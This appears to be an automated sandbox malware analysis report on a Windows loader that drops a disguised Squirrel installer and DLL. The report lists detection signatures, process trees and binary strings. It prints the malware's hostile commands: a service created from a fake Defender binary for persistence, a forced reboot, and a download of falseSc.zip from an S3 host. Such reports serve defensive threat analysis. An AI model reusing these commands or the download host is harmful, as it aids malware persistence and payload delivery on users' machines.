Windows Analysis Report
WKYC506_2389030007-00901003007010_777380775_#U00b2.exe

Overview

General Information

Sample name: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
renamed because original name is a hash value
Original sample name: WKYC506_2389030007-00901003007010_777380775_.exe
Analysis ID: 1383277
MD5: 511fdcc7fc2f4220353004cfb011f522
SHA1: 93ef93aa71476734b1598037838cc6b9fc8b47f7
SHA256: b457a493fad9212b369552df689d67b5e1feec656451cf586abcc5411cee6e00
Tags: exe

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
System process connects to network (likely due to code injection or exploit)
Found stalling execution ending in API Sleep call
Machine Learning detection for dropped file
Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil
Uses shutdown.exe to shutdown or reboot the system
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • WKYC506_2389030007-00901003007010_777380775_#U00b2.exe (PID: 6836 cmdline: "C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe" --rerunningWithoutUAC MD5: 511FDCC7FC2F4220353004CFB011F522)
    • Update.exe (PID: 1360 cmdline: "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC MD5: A560BAD9E373EA5223792D60BEDE2B13)
      • Stand.exe (PID: 6244 cmdline: "C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe" --squirrel-firstrun MD5: A8AEC0D17F15C613DCCAD945FCF6F928)
        • rundll32.exe (PID: 7328 cmdline: "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2 MD5: EF3179D498793BF4234F708D3BE28633)
          • rundll32.exe (PID: 7344 cmdline: "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2 MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 7472 cmdline: "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower MD5: EF3179D498793BF4234F708D3BE28633)
          • rundll32.exe (PID: 7516 cmdline: "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower MD5: 889B99C52A60DD49227C5E485A016679)
            • cmd.exe (PID: 7796 cmdline: "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 7852 cmdline: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
            • shutdown.exe (PID: 8004 cmdline: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
              • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6740 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found

Source | Rule | Description | Author | Strings
Update.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Local\SquirrelTemp\Update.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Local\Extra\Update.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
2.0.Update.exe.370000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

          System Summary

          Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC, CommandLine: "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, NewProcessName: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, OriginalFileName: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, ParentCommandLine: "C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe" --rerunningWithoutUAC, ParentImage: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, ParentProcessId: 6836, ParentProcessName: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC, ProcessId: 1360, ProcessName: Update.exe
          Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, CommandLine: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7796, ParentProcessName: cmd.exe, ProcessCommandLine: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, ProcessId: 7852, ProcessName: sc.exe
          Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6740, ProcessName: svchost.exe
          No Snort rule has matched

          AV Detection

          Source: C:\Program Files (x86)\Microsoft.NET\MpClient.dll, Virustotal: Detection: 10%
          Source: C:\Program Files (x86)\Microsoft.NET\MpClient.dll, Joe Sandbox ML: detected
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Extra
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, File created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.log
          Source: unknown, HTTPS traffic detected: 52.95.163.114:443 -> 192.168.2.4:49735 version: TLS 1.2
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: MpSvc.pdbGCTL source: MpSvc.dll.11.dr
          Source: Binary string: ConfigSecurityPolicy.pdb source: ConfigSecurityPolicy.exe.11.dr
          Source: Binary string: NisSrv.pdb source: NisSrv.exe.11.dr
          Source: Binary string: MpAzSubmit.pdb source: MpAzSubmit.dll.11.dr
          Source: Binary string: MpCmdRun.pdbGCTL source: MpCmdRun.exe.11.dr
          Source: Binary string: netstandard.pdb.mdb source: Update.exe, 00000002.00000002.1701986264.000000001B4F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000002.00000000.1651849310.0000000000372000.00000002.00000001.01000000.00000005.sdmp, Update.exe.2.dr
          Source: Binary string: ConfigSecurityPolicy.pdbOGPS source: ConfigSecurityPolicy.exe.11.dr
          Source: Binary string: MpRTP.pdb source: MpRtp.dll.11.dr
          Source: Binary string: MpRTP.pdbGCTL source: MpRtp.dll.11.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: Update.exe, 00000002.00000002.1700421994.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028D6000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: endpointdlp.pdb source: endpointdlp.dll.11.dr
          Source: Binary string: MpCmdRun.pdb source: MpCmdRun.exe.11.dr
          Source: Binary string: shellext.pdb source: shellext.dll.11.dr
          Source: Binary string: endpointdlp.pdbGCTL source: endpointdlp.dll.11.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
          Source: Binary string: MpDetours.pdb source: MpDetours.dll.11.dr
          Source: Binary string: MpAzSubmit.pdbGCTL source: MpAzSubmit.dll.11.dr
          Source: Binary string: C:\Users\DeveloperSys\Desktop\Projetos C# para Loaders\Stand\obj\x64\Release\Stand.pdb source: Update.exe, 00000002.00000002.1700421994.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028B0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: MpDetours.pdbGCTL source: MpDetours.dll.11.dr
          Source: Binary string: MpCommu.pdb source: MpCommu.dll.11.dr
          Source: Binary string: MpCommu.pdbGCTL source: MpCommu.dll.11.dr
          Source: Binary string: shellext.pdbOGPS source: shellext.dll.11.dr
          Source: Binary string: C:\Users\DeveloperSys\Desktop\Projetos C# para Loaders\Stand\obj\x64\Release\Stand.pdbx source: Update.exe, 00000002.00000002.1700421994.00000000028F0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: NisSrv.pdbGCTL source: NisSrv.exe.11.dr
          Source: Binary string: C:\Users\DeveloperSys\Desktop\Projetos C# para Loaders\Stand\obj\x64\Release\Stand.pdbIvan Medvedev source: Update.exe, 00000002.00000002.1700421994.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028B0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: MpSvc.pdb source: MpSvc.dll.11.dr
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_041ED3E4 FindFirstFileW,FindClose,7_2_041ED3E4
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_041ECE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,7_2_041ECE18
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 11_2_0463D3E4 FindFirstFileW,FindClose,11_2_0463D3E4
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 11_2_04654D5C FindFirstFileW,FindClose,11_2_04654D5C
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 11_2_0463CE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,11_2_0463CE18
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 11_2_04652D1C GetLogicalDriveStringsW,QueryDosDeviceW,11_2_04652D1C

          Networking

          Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 52.95.163.114 443
          Source: Yara match, File source: Update.exe, type: SAMPLE
          Source: Yara match, File source: 2.0.Update.exe.370000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, type: DROPPED
          Source: Yara match, File source: C:\Users\user\AppData\Local\Extra\Update.exe, type: DROPPED
          Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global traffic, HTTP traffic detected: GET /falseSc.zip HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: b38709202.s3.sa-east-1.amazonaws.com | Connection: Keep-Alive
          Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 11_2_0484AC78 Sleep,URLDownloadToFileW,Sleep,11_2_0484AC78
          Source: unknown, DNS traffic detected: queries for: b38709202.s3.sa-east-1.amazonaws.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownHTTPS traffic detected: 52.95.163.114:443 -> 192.168.2.4:49735 version: TLS 1.2

          System Summary

          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: Resource name: DATA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: NisSrv.exe.11.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: EppManifest.dll.mui.11.drStatic PE information: No import functions for PE file found
          Source: EppManifest.dll.mui0.11.drStatic PE information: No import functions for PE file found
          Source: MsMpLics.dll.11.drStatic PE information: No import functions for PE file found
          Source: MpAsDesc.dll.mui0.11.drStatic PE information: No import functions for PE file found
          Source: MsMpRes.dll.mui0.11.drStatic PE information: No import functions for PE file found
          Source: ProtectionManagement.dll.mui0.11.drStatic PE information: No import functions for PE file found
          Source: MpEvMsg.dll.11.drStatic PE information: No import functions for PE file found
          Source: EppManifest.dll.11.drStatic PE information: No import functions for PE file found
          Source: EppManifest.dll0.11.drStatic PE information: No import functions for PE file found
          Source: OfflineScannerShell.exe.mui0.11.drStatic PE information: No import functions for PE file found
          Source: MpEvMsg.dll.mui0.11.drStatic PE information: No import functions for PE file found
          Source: MpEvMsg.dll.mui.11.drStatic PE information: No import functions for PE file found
          Source: MsMpLics.dll0.11.drStatic PE information: No import functions for PE file found
          Source: Stand.exe.2.drStatic PE information: No import functions for PE file found
          Source: MpAsDesc.dll.11.drStatic PE information: No import functions for PE file found
          Source: shellext.dll.mui.11.drStatic PE information: No import functions for PE file found
          Source: OfflineScannerShell.exe.mui.11.drStatic PE information: No import functions for PE file found
          Source: ProtectionManagement.dll.mui.11.drStatic PE information: No import functions for PE file found
          Source: MpAsDesc.dll.mui.11.drStatic PE information: No import functions for PE file found
          Source: MsMpRes.dll.mui.11.drStatic PE information: No import functions for PE file found
          Source: shellext.dll.mui0.11.drStatic PE information: No import functions for PE file found
          Source: MsMpRes.dll.11.drStatic PE information: No import functions for PE file found
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, 00000001.00000003.1651338703.00000000025E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe2 vs WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, 00000001.00000003.1651338703.00000000025EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe2 vs WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeBinary or memory string: OriginalFilenameSetup.exe* vs WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Stand.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: MpRtp.dll.11.drBinary string: \\?\UNC\\\.\\\\\?\\Device\Mup\tsclient\HashDigestLengthObjectLengthS:P(TL;CIOI;0x%lx;;;%s)S:S-1-19-512-1536S-1-1-0
          Source: MpRtp.dll.11.drBinary string: uxX\Device\SftVol\\Device\MountPointManagerFile ID\\%s
          Source: MpRtp.dll.11.drBinary string: =6b\DEVICEfile\\.\transactionfilebootsamplefileexpensivesamplefilerequested%lu->%ld / %ld%c%ldremote%ld%cfixedremovable%ws / %wsnot boot%SystemDrive%Passthrough\SystemRoot\\Device\AUDIT{5737d832-9e2c-4922-9623-48a220290dcb}FolderGuardTargetPathFolderGuardTargetDiskFolderGuardId7m
          Source: MpCmdRun.exe.11.drBinary string: kernelbase.dllRaiseFailFastException%wswilstd::exception: %hsonecore\internal\sdk\inc\wil\opensource\wil\resource.h_p0WilError_03Bad optional accessamcore\antimalware\source\service\tools\mpcmdtool\mpperformancereport.cppProcessIdReasonPID\\?\\Device\\drivers\\FI_UNKNOWNerror: invalid data: System path changed during the trace from "%ls" to "%ls"
          Source: MpSvc.dll.11.drBinary string: 8\Device\Mup
          Source: MpRtp.dll.11.drBinary string: C:\Device\Mup
          Source: MpRtp.dll.11.drBinary string: \??\Volume\Device\LanmanRedirector\\Device\Harddisk\Device\CdRom\Device\Floppy\Device\WinDfs\\Device\RdpDr\\Device\WebDavRedirector\\Device\Mup\GetVolumePathNamesForVolumeNameW*?%ws%ws[Exclusion] %ls is discarded due to error %#lx best\Device\LanmanRedirector
          Source: classification engineClassification label: mal76.rans.troj.evad.winEXE@22/84@1/2
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\0
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\Extra
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\.squirrel-lock-B35071413DA7AE3DB082CF25CF8755ACAD137999
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeString found in binary or memory: DeploymentTool.exe\need dictionaryinvalid literal/length codeinvalid distance codeinvalid block typeinvalid stored block lengthstoo many length or distance symbolsinvalid bit length repeatoversubscribed dynamic bit lengths treeincomplete dynamic bit lengths treeoversubscribed literal/length treeincomplete literal/length treeoversubscribed distance treeincomplete distance treeempty distance tree with lengthsunknown compression methodinvalid window sizeincorrect header checkincorrect data check\..\\..//..//..\UT%s%s%s%s%sOpen Setup LogCloseInstallation has failedSquirrelSQUIRREL_TEMP%s%s\%sUnable to write to %s - IT policies may be restricting access to this folder\SquirrelTemp%s\SquirrelSetup.logDATAUpdate.exe"%s" --install . %sThere was an error while installing the application. Check the setup log for more information and contact the author.Failed to extract installervector<T> too longi
          Source: unknownProcess created: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
          Source: unknownProcess created: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe "C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe" --rerunningWithoutUAC
          Source: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exeProcess created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess created: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe "C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe" --squirrel-firstrun
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
          Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
          Source: Stand.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Extra\Stand.exe
          Source: Stand.lnk0.2.drLNK file: ..\AppData\Local\Extra\Stand.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Extra
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic file information: File size 30540800 > 1048576
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1cf5600
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: MpSvc.pdbGCTL source: MpSvc.dll.11.dr
          Source: Binary string: ConfigSecurityPolicy.pdb source: ConfigSecurityPolicy.exe.11.dr
          Source: Binary string: NisSrv.pdb source: NisSrv.exe.11.dr
          Source: Binary string: MpAzSubmit.pdb source: MpAzSubmit.dll.11.dr
          Source: Binary string: MpCmdRun.pdbGCTL source: MpCmdRun.exe.11.dr
          Source: Binary string: netstandard.pdb.mdb source: Update.exe, 00000002.00000002.1701986264.000000001B4F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000002.00000000.1651849310.0000000000372000.00000002.00000001.01000000.00000005.sdmp, Update.exe.2.dr
          Source: Binary string: ConfigSecurityPolicy.pdbOGPS source: ConfigSecurityPolicy.exe.11.dr
          Source: Binary string: MpRTP.pdb source: MpRtp.dll.11.dr
          Source: Binary string: MpRTP.pdbGCTL source: MpRtp.dll.11.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: Update.exe, 00000002.00000002.1700421994.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028D6000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: endpointdlp.pdb source: endpointdlp.dll.11.dr
          Source: Binary string: MpCmdRun.pdb source: MpCmdRun.exe.11.dr
          Source: Binary string: shellext.pdb source: shellext.dll.11.dr
          Source: Binary string: endpointdlp.pdbGCTL source: endpointdlp.dll.11.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
          Source: Binary string: MpDetours.pdb source: MpDetours.dll.11.dr
          Source: Binary string: MpAzSubmit.pdbGCTL source: MpAzSubmit.dll.11.dr
          Source: Binary string: C:\Users\DeveloperSys\Desktop\Projetos C# para Loaders\Stand\obj\x64\Release\Stand.pdb source: Update.exe, 00000002.00000002.1700421994.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028B0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: MpDetours.pdbGCTL source: MpDetours.dll.11.dr
          Source: Binary string: MpCommu.pdb source: MpCommu.dll.11.dr
          Source: Binary string: MpCommu.pdbGCTL source: MpCommu.dll.11.dr
          Source: Binary string: shellext.pdbOGPS source: shellext.dll.11.dr
          Source: Binary string: C:\Users\DeveloperSys\Desktop\Projetos C# para Loaders\Stand\obj\x64\Release\Stand.pdbx source: Update.exe, 00000002.00000002.1700421994.00000000028F0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: NisSrv.pdbGCTL source: NisSrv.exe.11.dr
